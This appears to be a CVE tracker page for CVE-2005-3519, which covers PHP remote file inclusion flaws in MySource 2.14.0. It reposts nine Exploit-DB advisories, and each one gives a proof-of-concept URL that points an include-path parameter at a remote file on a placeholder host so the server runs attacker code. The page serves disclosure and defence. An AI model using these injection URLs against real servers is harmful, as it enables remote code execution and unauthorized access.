CVE-2005-3519
published 2005-11-06CVE-2005-3519: Multiple PHP file inclusion vulnerabilities in MySource 2.14.0 allow remote attackers to execute arbitrary PHP code and include arbitrary local files via the…
PriorityP347high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
8.01%
94.0th percentile
Multiple PHP file inclusion vulnerabilities in MySource 2.14.0 allow remote attackers to execute arbitrary PHP code and include arbitrary local files via the (1) INCLUDE_PATH and (2) SQUIZLIB_PATH parameters in new_upgrade_functions.php, (3) the INCLUDE_PATH parameter in init_mysource.php, and the PEAR_PATH parameter in (4) Socket.php, (5) Request.php, (6) Mail.php, (7) Date.php, (8) Span.php, (9) mimeDecode.php, and (10) mime.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mysource | mysource | — | — |
| mysource | mysource | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MySource 2.14 - 'init_mysource.php?INCLUDE_PATH' Remote File Inclusion
exploitdb·2005-10-18
CVE-2005-3519 MySource 2.14 - 'init_mysource.php?INCLUDE_PATH' Remote File Inclusion
MySource 2.14 - 'init_mysource.php?INCLUDE_PATH' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/15133/info
MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/web/init_mysource.php?INCLUDE_PATH=http://www.example.com/[file]?
Exploit-DB
MySource 2.14 - 'Date.php?PEAR_PATH' Remote File Inclusion
exploitdb·2005-10-18
CVE-2005-3519 MySource 2.14 - 'Date.php?PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'Date.php?PEAR_PATH' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/15133/info
MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/pear/Date/Date.php?PEAR_PATH=http://www.example.com/[file]?
Exploit-DB
MySource 2.14 - 'mimeDecode.php?PEAR_PATH' Remote File Inclusion
exploitdb·2005-10-18
CVE-2005-3519 MySource 2.14 - 'mimeDecode.php?PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'mimeDecode.php?PEAR_PATH' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/15133/info
MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/pear/Mail_Mime/mimeDecode.php?PEAR_PATH=http://www.example.com/[file]?
Exploit-DB
MySource 2.14 - 'new_upgrade_functions.php' Multiple Remote File Inclusions
exploitdb·2005-10-18
CVE-2005-3519 MySource 2.14 - 'new_upgrade_functions.php' Multiple Remote File Inclusions
MySource 2.14 - 'new_upgrade_functions.php' Multiple Remote File Inclusions
---
source: https://www.securityfocus.com/bid/15133/info
MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/web/edit/upgrade_functions/new_upgrade_functions.php?INCLUDE_PATH=http://www.example.com/[file]?
http://www.example.com/web/edit/upgrade_functions/new_upgrade_functions.php?SQUIZLIB_PATH=http://www.example.com/[file]?
Exploit-DB
MySource 2.14 - 'mail.php?PEAR_PATH' Remote File Inclusion
exploitdb·2005-10-18
CVE-2005-3519 MySource 2.14 - 'mail.php?PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'mail.php?PEAR_PATH' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/15133/info
MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/pear/Mail/Mail.php?PEAR_PATH=http://www.example.com/[file]?
Exploit-DB
MySource 2.14 - 'Request.php?PEAR_PATH' Remote File Inclusion
exploitdb·2005-10-18
CVE-2005-3519 MySource 2.14 - 'Request.php?PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'Request.php?PEAR_PATH' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/15133/info
MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/pear/HTTP_Request/Request.php?PEAR_PATH=http://www.example.com/[file]?
Exploit-DB
MySource 2.14 - 'Span.php?PEAR_PATH' Remote File Inclusion
exploitdb·2005-10-18
CVE-2005-3519 MySource 2.14 - 'Span.php?PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'Span.php?PEAR_PATH' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/15133/info
MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/pear/Date/Date/Span.php?PEAR_PATH=http://www.example.com/[file]?
Exploit-DB
MySource 2.14 - 'Socket.php?PEAR_PATH' Remote File Inclusion
exploitdb·2005-10-18
CVE-2005-3519 MySource 2.14 - 'Socket.php?PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'Socket.php?PEAR_PATH' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/15133/info
MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/pear/Net_Socket/Socket.php?PEAR_PATH=http://www.example.com/[file]?
Exploit-DB
MySource 2.14 - 'mime.php?PEAR_PATH' Remote File Inclusion
exploitdb·2005-10-18
CVE-2005-3519 MySource 2.14 - 'mime.php?PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'mime.php?PEAR_PATH' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/15133/info
MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/pear/Mail_Mime/mime.php?PEAR_PATH=http://www.example.com/[file]?
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=112966933202769&w=2http://secunia.com/advisories/16946/http://securityreason.com/securityalert/92http://securitytracker.com/id?1015075http://www.osvdb.org/20035http://www.osvdb.org/20036http://www.osvdb.org/20037http://www.osvdb.org/20038http://www.osvdb.org/20039http://www.osvdb.org/20040http://www.osvdb.org/20041http://www.osvdb.org/20042http://www.osvdb.org/20043http://www.securityfocus.com/bid/15133/discusshttp://www.vupen.com/english/advisories/2005/2132https://exchange.xforce.ibmcloud.com/vulnerabilities/22772http://marc.info/?l=bugtraq&m=112966933202769&w=2http://secunia.com/advisories/16946/http://securityreason.com/securityalert/92http://securitytracker.com/id?1015075http://www.osvdb.org/20035http://www.osvdb.org/20036http://www.osvdb.org/20037http://www.osvdb.org/20038http://www.osvdb.org/20039http://www.osvdb.org/20040http://www.osvdb.org/20041http://www.osvdb.org/20042http://www.osvdb.org/20043http://www.securityfocus.com/bid/15133/discusshttp://www.vupen.com/english/advisories/2005/2132https://exchange.xforce.ibmcloud.com/vulnerabilities/22772
2005-11-06
Published